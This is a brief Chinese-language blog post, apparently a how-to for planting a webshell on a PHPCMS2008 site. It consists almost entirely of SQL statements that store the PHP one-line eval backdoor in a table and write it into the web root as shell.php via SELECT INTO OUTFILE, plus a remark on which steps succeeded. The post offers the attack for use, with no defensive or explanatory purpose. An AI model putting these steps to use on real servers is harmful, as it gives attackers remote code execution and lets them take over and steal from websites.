http://www.pcsec.org/archives/how-to-get-phpcms2008-webshell.html

Posted by 小拳头

进去后

SQL代码
Create TABLE b (cmd text NOT NULL);
SQL代码
Insert INTO b (cmd) VALUES(‘<?php @eval($_POST[cmd]);?>’);
//在字段cmd中插入一句话木马，木马内容为

PHP代码
<?php @eval($_POST[cmd]);?>
前3句都尅执行成功最后一句执行后显示空白

SQL代码
select cmd from b into outfile ‘E:\wwwroot\phpcms\phpcms\shell.php’;